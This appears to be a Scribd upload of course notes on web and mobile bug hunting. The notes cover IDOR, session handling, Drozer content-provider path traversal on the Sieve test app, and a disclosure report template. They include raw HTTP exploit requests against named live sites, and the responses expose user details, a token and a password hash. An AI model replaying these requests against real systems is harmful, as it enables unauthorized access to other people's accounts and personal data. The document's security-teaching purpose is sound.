Scribd
Upload
52 views7 pages

Day 9 Last Day

The document discusses insecure direct object reference (IDOR) vulnerabilities. It provides examples of IDOR issues where an attacker can access or modify unauthorized user data by manipulating ID parameters. It also discusses related topics like improper session handling vulnerabilities.

Uploaded by

tapiwarusike
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
52 views7 pages

Day 9 Last Day

The document discusses insecure direct object reference (IDOR) vulnerabilities. It provides examples of IDOR issues where an attacker can access or modify unauthorized user data by manipulating ID parameters. It also discusses related topics like improper session handling vulnerabilities.

Uploaded by

tapiwarusike
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 7

IDOR - Insecure direct object reference -

https://abc.com/userprofile?id=1234

- asif

Aman -
https://abc.com/userprofile?if=12345
https://abc.com/userprofile?id=1234

The attacker is able to access or manipulate or modify


an id para which should not be allowed

Access to unauthorized data- if an attacker can guess or


increment the id parameter and access another user
data , its idor vul.

Pii

POST /rajsacademy_app_ctrl/get_profile HTTP/1.1


Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
User-Agent: Dalvik/2.1.0 (Linux; U; Android 6.0; Phone
Build/MRA58K)
Host: www.rajsacademy.com
Connection: close
Accept-Encoding: gzip, deflate
Content-Length: 163

user_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJp
ZCI6IjkyMTgiLCJkZXZpY2VfaWQiOiI3ZTljMDlmZDExNjY2
MTUifQ.Z6aGWoYplx9GJ7yHmckG7iztOOM3V1p13gfjt9
8DMGw&userid=9210&

HTTP/1.1 200 OK
Date: Tue, 26 Sep 2023 13:41:45 GMT
Server: Apache/2.4.54 (Ubuntu)
Set-Cookie:
ci_session=3f10pih9he4kdpulivlb7ctprupvpk4q;
expires=Tue, 26-Sep-2023 15:41:45 GMT; Max-
Age=7200; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 150
Connection: close
Content-Type: application/json

{"status":true,"message":"Success","image":"","name":"
Aiswarya
","location":"","mobile":"","email":"@gmail.com"}

Idor - high

Otp - raj - vul

Otp bypass - idor = account takeover - critical - chaining

Idor -otp - account takeover

2020 - app - 2k $
Improper Session Handling

Swiggy - login - making profile -changing the name -


logout

Asif - swiggy - name - asif1 - logout - asif123

Burpsuite

POST /api/v2/edit_user HTTP/1.1


authkey: 123456
Content-Length: 302
Content-Type: application/x-www-form-urlencoded
Host: jaipursabjimandi.com
Connection: close
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

device_id=d0tHS7lyEMY%3AAPA91bFBIQt8Y2rYklzhykZZ
oSAdV1TeevLXcVH3JVfPOyhhtGa7OonoM2_NEDUogWu
oyfEiXrvKhCzhfmVTpXt7-
BonhM_vFtSeVBB6P39sQnB6XODJ21FrRH4BgU44fB4Vbf
1gdmWm&device_type=android&user_id=12525&zipco
de=665464&email=propubgking123%40gmail.com&user
name=null&full_name=asif123&phone_number=867657
5676

HTTP/1.1 200 OK
date: Tue, 26 Sep 2023 13:49:12 GMT
server: Apache/2.4.41 (Ubuntu)
cache-control: no-cache, private
x-ratelimit-limit: 60
x-ratelimit-remaining: 59
vary: Accept-Encoding
content-length: 899
content-type: text/html; charset=UTF-8
connection: close

{"status":"success","message":"Your profile has been


updated
successfully.","data":{"id":"12525","user_role_id":"0","fi
rst_name":"","last_name":"","full_name":"asif123","slu
g":"test","username":null,"email":"propubgking123@g
mail.com","phone_number":"8676575676","password":
"$2y$10$j9aTuTnD7K3kxpM19rjsFunh48PQRrSlC99Hh4
o1v1kiAbikpcEKS","image":"https:\/\/fanyv88.com:443\/https\/jaipursabjimandi.c
om\/img\/usr_img.png","is_verified":"0","is_active":"1",
"validate_string":"66731158181c5150bf4d6a5f5975467
8","forgot_password_validate_string":null,"verification_
code":null,"is_deleted":"0","remember_token":null,"ag
ent_code":"","created_at":"2023-09-26
18:24:24","updated_at":"2023-09-26
19:19:12","deleted_at":"0","device_type":"android","de
vice_id":"d0tHS7lyEMY:APA91bFBIQt8Y2rYklzhykZZoSAd
V1TeevLXcVH3JVfPOyhhtGa7OonoM2_NEDUogWuoyfEi
XrvKhCzhfmVTpXt7-
BonhM_vFtSeVBB6P39sQnB6XODJ21FrRH4BgU44fB4Vbf
1gdmWm","zipcode":"665464"}}

Local File Inclusion

Drozer
Application

content providers exported 1 ,2 ,3

Getting the package name


Attacksurface
Info for provider
Finding uri
Scanning vul uri
Exploit

Report a vul/bug -

run app.package.attacksurface com.mwr.example.sieve


run app.provider.info -a com.mwr.example.sieve
run app.provider.finduri com.mwr.example.sieve
run scanner.provider.traversal -a
com.mwr.example.sieve
run app.provider.read
content://com.mwr.example.sieve.FileBackupProvider/
proc/cpuinfo

Responsible Disclosure/ vul report


Vulnerability Name - idor

Vulnerable URL/App - http://abc.com/ app name


version

Description -

Steps to reproduce -
steps that we have taken to find a bug

Impact -

POC - proof of concept - img/photo/video

Solution

Project -
Application
3 days

4 vul - app

App - 4 vul.
Asif.apk -12 vuls -4 vul.

Minimum 4

Thecyberhost , name ,index

You might also like